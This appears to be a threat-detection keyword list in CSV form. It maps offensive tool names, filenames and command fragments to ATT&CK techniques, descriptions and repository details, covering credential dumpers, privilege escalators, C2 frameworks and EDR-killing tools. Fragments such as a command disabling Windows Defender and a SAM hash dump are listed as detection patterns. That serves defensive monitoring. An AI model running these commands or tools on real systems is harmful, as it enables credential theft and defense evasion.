-*S12cybersecurity/RDPCredentialStealer*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z
-*S3cretP4ssw0rd!*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z
-*S3cur3Th1sSh1t*,offensive_tool_keyword,Github Username,Github username of hackr known for exploitation scripts Pentesting. 
scripting and pwning!,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*S3cur3Th1sSh1t/MultiPotato*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z
-*S3cur3Th1sSh1t/PowerSharpPack*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*s3scanner -*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z
-*s3scanner dump *,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z
-*s3scanner scan *,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z
-*S3Scanner-master*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z
-*S4U2self.py*,offensive_tool_keyword,POC,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - 
T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z
-*S4uDelegator.*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z
-*S4UTomato 1.0.0-beta*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z
-*S4UTomato.csproj*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z
-*S4UTomato.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z
-*S4UTomato.sln*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z
-*S4UTomato-master*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege 
Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*s7scan*,offensive_tool_keyword,Github Username,s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.,T1046 - T1018 - T1049 - T1040 - T1016 - T1057,TA0043 - TA0042 - TA0001,N/A,N/A,Exploitation tools,https://github.com/klsecservices/s7scan,1,1,N/A,N/A,2,121,45,2018-12-28T12:11:56Z,2018-10-12T08:52:04Z -*sa7mon/S3Scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*safari_in_operator_side_effect.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*safari_proxy_object_type_confusion.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SafeBreach-Labs/EDRaser*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*safetydump*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z 
-*safetydump.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*safetydump.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*SafetyKatz.csproj*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*SafetyKatz.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*SafetyKatz.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*SafetyKatz.exe*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE 
Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*SafetyKatz.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SafetyKatz.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SafetyKatz.sln*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z
-*safetykatz.txt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*SafetyKatzManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*SafetyKatz-master*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z
-*sailay1996*,offensive_tool_keyword,Github Username,github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sailay1996,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Salsa-tools*,offensive_tool_keyword,Salsa-tools,Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. 
allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019,T1027 - T1036 - T1059 - T1071 - T1073 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/Hackplayers/Salsa-tools,1,0,N/A,N/A,6,564,140,2020-01-31T22:41:35Z,2019-02-04T21:31:28Z -*sam_the_admin.py*,offensive_tool_keyword,sam-the-admin,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1208 - T1218.005 - T1055.002,TA0006 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,0,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*SamAdduser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z
-*sambaPipe.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*samdump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*samdump.py*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*samdump.zip*,offensive_tool_keyword,samdump,Dumping sam,T1003,TA0006,N/A,N/A,Credential Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z
-*samdump2 *,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A
-*samdump2 SYSTEM SAM > 
*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*samdump2.c*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*sample_brc4.json*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*samr_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*samratashok/nishang*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*samrdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*sandboxevasion.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*SAP_GW_RCE_exploit*,offensive_tool_keyword,SAP_GW_RCE_exploit,This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) 
SAPanonGWv2.py is the second version of the exploit based on the pysap library,T1078 - T1046 - T1201 - T1021,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chipik/SAP_GW_RCE_exploit,1,0,N/A,N/A,2,145,48,2020-09-07T13:46:04Z,2019-03-14T13:52:00Z
-*sap2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*SauronEye.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*sc config WinDefend start= disabled*,greyware_tool_keyword,shell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*sc create plumber*warpzoneclient*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*sc create Terminator *.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z
-*sc delete plumber*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #7,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*sc_inject_direct.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z
-*sc_inject_indirect.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z
-*sc0tfree*,offensive_tool_keyword,Github Username,github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sc0tfree,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
